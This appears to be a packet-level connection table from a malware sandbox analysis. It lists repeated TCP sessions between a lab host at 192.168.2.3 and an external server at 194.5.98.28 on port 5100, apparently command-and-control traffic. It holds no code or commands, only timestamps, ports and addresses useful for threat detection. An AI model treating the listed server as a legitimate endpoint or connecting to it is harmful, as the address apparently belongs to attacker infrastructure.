Jan 13, 2022 15:34:08.048518896 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.048552990 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.048578024 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.048599005 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.048613071 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.048751116 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.048777103 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.048799038 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.048799038 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.048816919 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.048837900 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.048943043 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.048968077 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.048991919 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.049005032 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.267565012 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.267600060 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.267622948 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.267652988 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.267687082 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.267846107 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.267904043 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.268316031 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.268356085 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.268368959 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.268397093 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.268409014 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.268443108 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.268487930 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.268529892 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269254923 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.269294977 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.269319057 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269332886 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.269345045 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269373894 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.269375086 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269414902 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.269414902 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269460917 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269531965 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.269572020 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.269572020 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269617081 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.269956112 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.270024061 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.364696980 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.486079931 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.486138105 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.486780882 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.487191916 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.487231970 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.487270117 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.487308979 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.487345934 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.487349033 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.487369061 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.487415075 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489139080 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489177942 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489217997 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489255905 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489258051 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489298105 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489315987 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489339113 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489342928 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489362955 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489376068 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489415884 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489428043 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489458084 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489495039 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489532948 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489561081 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489572048 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489612103 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489634991 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489653111 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489689112 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489723921 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489723921 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489763021 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489799976 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489821911 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489839077 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489872932 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489886999 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489895105 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489901066 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.489902020 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489939928 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.489979029 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.490016937 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.490042925 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.490053892 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.490092039 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.490150928 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.490226030 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:08.490760088 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:12.544362068 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:12.760339975 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:12.760449886 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:12.887154102 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:13.125147104 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:13.125243902 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:13.404206991 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:13.404644966 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:13.624209881 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:13.624811888 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:13.904431105 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:13.907181025 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.177711964 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.178605080 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.199357986 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.199408054 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.199430943 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.199517012 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.199624062 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.199691057 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.416640997 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.416701078 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.416738987 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.416794062 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.416825056 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.416846037 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.416899920 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.417021036 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.417150021 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.417164087 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.417237043 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.417339087 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.417380095 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.417407036 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.417488098 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.633936882 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.633992910 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634031057 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634066105 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634143114 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.634177923 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634217024 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634285927 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.634310007 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634344101 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.634402037 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.634505033 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634608030 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634622097 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.634699106 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.634766102 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634860992 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.634942055 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.634982109 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.635024071 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.635082960 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.635145903 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.635240078 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.635313034 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.635351896 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.635399103 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.635456085 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.635519028 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.635610104 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.740149975 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.851717949 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.851890087 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.851986885 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852031946 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852082968 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.852154970 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.852210999 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852294922 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.852391005 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852468014 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.852514029 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852586031 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.852742910 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852782011 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852821112 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.852885962 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.852885962 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.852930069 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853012085 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853040934 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853075981 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853117943 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853156090 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853224039 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853255033 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853328943 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853421926 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853498936 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853646040 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853687048 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853724957 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853724957 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853841066 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.853899002 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.853981972 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854095936 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854167938 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854259014 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854301929 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854337931 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854406118 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854410887 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854460001 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854617119 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854684114 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854712009 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854728937 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854768991 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854774952 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854819059 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854887009 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854892015 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854929924 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.854967117 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.854969025 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.855011940 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.855072021 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.855225086 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.855372906 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.855390072 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.855415106 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.855452061 CET	5100	49829	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:14.855453968 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.855509043 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:14.855577946 CET	49829	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:18.909116983 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:19.133367062 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:19.133541107 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:19.133821011 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:19.418163061 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:19.419792891 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:19.638140917 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:19.682280064 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:19.818655014 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.097927094 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.098056078 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.107040882 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.107103109 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.107145071 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.107177973 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.107186079 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.107259035 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.107321978 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.324157953 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.324189901 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.324263096 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.324341059 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.324871063 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.324892044 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.324939966 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.324959040 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.324980974 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.324996948 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.325020075 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.325057030 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.540467024 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541093111 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541136026 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541153908 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541255951 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541260004 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.541292906 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541297913 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.541312933 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541368961 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541390896 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.541524887 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.541774988 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541794062 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541810989 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.541876078 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.541877985 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.542051077 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.542278051 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.542321920 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.542339087 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.542355061 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.542390108 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.542408943 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.757924080 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.757987022 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.758028030 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.758045912 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.758173943 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.758238077 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.758485079 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.758768082 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.758807898 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.758821011 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.758980989 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.759027958 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.759047031 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.759227037 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.759268999 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.759270906 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.759308100 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.759346008 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.759346008 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.759661913 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.759706020 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.759803057 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760080099 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760123968 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.760292053 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760332108 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760370970 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760371923 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.760411024 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760448933 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.760451078 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760663033 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760703087 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760704994 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.760838032 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760879993 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.760934114 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.761029005 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.761102915 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.761291027 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.761328936 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.761353016 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.761368990 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.761372089 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.761404991 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.761451960 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.761471987 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.761516094 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.974730015 CET	5100	49830	194.5.98.28	192.168.2.3
